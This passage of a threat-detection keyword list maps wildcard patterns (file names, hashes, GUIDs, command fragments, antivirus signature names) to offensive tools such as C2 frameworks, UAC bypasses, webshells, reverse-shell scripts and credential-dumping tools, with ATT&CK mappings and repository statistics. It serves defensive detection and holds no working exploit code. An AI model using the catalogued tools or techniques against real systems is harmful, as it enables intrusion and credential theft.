have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*avflagged.exe*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,0,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -*avrdude -c usbasp -p m328p -U flash:w:avr.hex*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*avred-main.zip*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,1,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*av-update-urls.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*awesome-cve-poc*,offensive_tool_keyword,POC,list of poc exploitation for nown CVE,T1210 - T1583 - T1586 - T1589 - T1596,TA0002 - TA0011 - TA0007,N/A,N/A,Exploitation tools,https://github.com/qazbnm456/awesome-cve-poc,1,1,N/A,N/A,10,3159,741,2022-01-04T19:07:43Z,2017-02-02T06:43:14Z -*Awesome-Hacking*,offensive_tool_keyword,Awesome-Hacking,A collection of awesome lists for hackers. pentesters & security researchers.,T1566 - T1590 - T1204 - T1210 - T1212 - T1213,TA0002 - TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Hack-with-Github/Awesome-Hacking,1,1,N/A,N/A,10,69633,8680,2023-08-08T10:17:21Z,2016-03-30T15:47:10Z -*Awesome-Hacking-Resources*,offensive_tool_keyword,Awesome-Hacking-Resources,A collection of hacking / penetration testing resources to make you better!,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Exploitation tools,https://github.com/vitalysim/Awesome-Hacking-Resources,1,1,N/A,N/A,10,13936,2049,2022-08-22T09:10:41Z,2017-10-10T19:09:18Z -*awesome-osint*,offensive_tool_keyword,awesome-osint,A curated list of amazingly awesome open source intelligence tools and resources. 
Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC). the term open refers to overt. publicly available sources (as opposed to covert or clandestine sources),T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/jivoi/awesome-osint,1,1,N/A,N/A,10,14087,2400,2023-09-19T11:25:43Z,2016-11-30T13:26:11Z -*awesome-pentest*,offensive_tool_keyword,awesome-pentest,A collection of awesome penetration testing and offensive cybersecurity resources.,T1200 - T1210 - T1213 - T1583 - T1589,TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/enaqx/awesome-pentest,1,1,N/A,N/A,10,19300,4317,2023-09-19T03:06:47Z,2014-08-03T23:13:53Z -*awesome-pentest-cheat-sheets*,offensive_tool_keyword,awesome-pentest-cheat-sheets,Collection of cheat sheets useful for pentesting,T1583 - T1598 - T1596,TA0001 - TA0008 - TA0043,N/A,N/A,Exploitation tools,https://github.com/coreb1t/awesome-pentest-cheat-sheets,1,0,N/A,N/A,10,3505,755,2023-08-04T12:41:53Z,2016-11-29T00:00:18Z -*awesome-scapy*,offensive_tool_keyword,awesome-scapy,A Python tool and library for low level packet creation and manipulation,T1571 - T1596 - T1567 - T1569,TA0002 - TA0009 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/secdev/awesome-scapy,1,1,N/A,N/A,2,148,29,2023-03-08T23:26:41Z,2020-02-04T12:17:35Z -*awesome-static-analysis*,offensive_tool_keyword,awesome-static-analysis,This is a collection of static analysis tools and code quality checkers,T1064 - T1027 - T1029 - T1518,TA0003 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/codefactor-io/awesome-static-analysis,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*awesome-web-security*,offensive_tool_keyword,awesome-web-security,Curated list of Web Security materials and resources.Needless to say. most websites suffer from various types of bugs which may eventually lead to vulnerabilities. Why would this happen so often? 
There can be many factors involved including misconfiguration. shortage of engineers' security skills. etc. To combat this. here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques. and I highly encourage you to read this article So you want to be a web security researcher? first,T1190 - T1191 - T1192 - T1210 - T1213,TA0002 - TA0003 - TA0007,N/A,N/A,Web Attacks,https://github.com/qazbnm456/awesome-web-security,1,1,N/A,N/A,10,10120,1611,2023-09-07T06:54:29Z,2017-01-29T16:50:21Z -*awesome-windows-domain-hardening*,offensive_tool_keyword,awesome-windows-domain-hardening,A curated list of awesome Security Hardening techniques for Windows with additional links to exploitation tools,T1563 - T1059 - T1547 - T1057 - T1574,TA0002 - TA0008 - TA0003 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/PaulSec/awesome-windows-domain-hardening,1,0,N/A,N/A,10,1665,280,2020-01-07T19:56:18Z,2017-02-19T19:20:38Z -*awk_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*aws configure --profile exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*awsloot.py *,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. 
by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,0,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -*axcrypt2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*aydinnyunus/PassDetective*,offensive_tool_keyword,PassDetective,PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets,T1059 - T1059.004 - T1552 - T1552.001,TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/aydinnyunus/PassDetective,1,1,N/A,7,1,51,3,2023-08-16T16:51:15Z,2023-07-22T12:31:57Z -*azfvgayqKwtFApcvyRedpUXculaeCCGA*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,0,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*Azure-AccessPermissions.ps1*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,1,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Azure-AccessPermissions-master*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,1,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*AzureAD AutoLogon Brute*,offensive_tool_keyword,AzureAD_Autologon_Brute,Brute force attack tool for Azure AD Autologon,T1110 - T1078 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/AzureAD_Autologon_Brute,1,0,N/A,N/A,1,96,22,2023-02-17T20:11:27Z,2021-10-01T05:20:25Z -*AzureAD_Autologon_Brute*,offensive_tool_keyword,AzureAD_Autologon_Brute,Brute force attack tool for Azure AD Autologon,T1110 - T1078 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/AzureAD_Autologon_Brute,1,1,N/A,N/A,1,96,22,2023-02-17T20:11:27Z,2021-10-01T05:20:25Z -*azuread_decrypt_msol_*.ps1*,offensive_tool_keyword,powershell,method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync,T1003.006,TA0006,N/A,N/A,Credential Access,https://gist.github.com/analyticsearch/7453d22d737e46657eb57c44d5cf4cbb,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*AzureADLateralMovement*,offensive_tool_keyword,AzureADLateralMovement,AzureADLateralMovement allows to build Lateral Movement graph for Azure Active Directory entities - Users. Computers. Groups and Roles. Using the Microsoft Graph API AzureADLateralMovement extracts interesting information and builds json files containing lateral movement graph data compatible with Bloodhound 2.2.0,T1074 - T1075 - T1076,TA0008 - TA0009 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/talmaor/AzureADLateralMovement,1,1,N/A,N/A,2,111,21,2022-12-08T06:44:48Z,2019-06-22T06:13:28Z -*AzureADRecon.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*AzureC2Relay.zip*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,1,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*AzureC2Relay-main*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,1,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*AzureHound.ps1*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*azurehound/v2*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*-b bleeding-jumbo*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06*,offensive_tool_keyword,UACME,Defeating Windows 
User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*b23r0/Heroinn*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*b23r0/rsocx*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,1,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*b289e30ce698eb0402babc2788ac7022b6a7db161296182e0e13fd021a3bee03*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*b2xtranslator.xls.csproj*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*B374K*index.php*,offensive_tool_keyword,b374k,This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser,T1021 - T1028 - T1071 - T1105 - T1135,TA0002 - TA0003 - TA0005,N/A,N/A,Web Attacks,https://github.com/b374k/b374k,1,0,N/A,N/A,10,2248,783,2023-07-06T20:23:03Z,2014-01-09T04:43:32Z -*b3rito*yodo*,offensive_tool_keyword,yodo,This tool proves how easy it is to become root via limited sudo permissions. via dirty COW or using Pa(th)zuzu. ,T1068 - T1078 - T1529,TA0004 - TA0008,N/A,N/A,Exploitation tools,https://github.com/b3rito/yodo,1,1,N/A,N/A,3,202,34,2017-02-28T15:38:13Z,2016-11-13T21:02:03Z -*b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*b4ldr/nse-scripts*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*b4rtik/RedPeanut*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - 
TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*b4rtik/RedPeanut*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1095 - T1071.004,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*B5627919-4DFB-49C6-AC1B-C757F4B4A103*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*B64_ENCODED_PAYLOAD_UUID*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*b64encode*.:::-989-:::.*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration 
simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*b64payloadgen.sh*,offensive_tool_keyword,POC,exploitation of CVE-2021-4034,T1210,N/A,N/A,N/A,Exploitation tools,https://github.com/luijait/PwnKit-Exploit,1,1,N/A,N/A,1,79,14,2022-02-07T15:42:00Z,2022-01-26T18:01:26Z -*b64stager*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*B651A53C-FAE6-482E-A590-CA3B48B7F384*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*B67143DE-321D-4034-AC1D-C6BB2D98563F*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*B67143DE-321D-4034-AC1D-C6BB2D98563F*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*b7671f125bb2ed21d0476a00cfaa9ed6*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*b7dec074f463b0be08dd3a707495e45c7a629502fa6dd7ef972a74a2aff72632*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*ba8fe35020bcd560c0f100bda43c2311bfdbb97aafbe367ac5077cebca59287f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*babelstrike.py -*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. 
from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,0,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -*BabelStrike-main*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,1,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -*Backdoor LNK*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,0,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*Backdoor.*,offensive_tool_keyword,backdoor keyword,keyword observed in multiple backdoor tools,T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001,TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*backdoor.asp*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*Backdoor.ASP.FUZZSHELL.A*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Backdoor.ASP.WEBSHELL.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*backdoor.aspx*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*backdoor.jsp*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*backdoor.php*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*Backdoor.PHP.WebShell.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Backdoor/Win.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Backdoor:JS/*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,backdoor signatures,N/A,N/A,N/A,N/A,N/A,N/A 
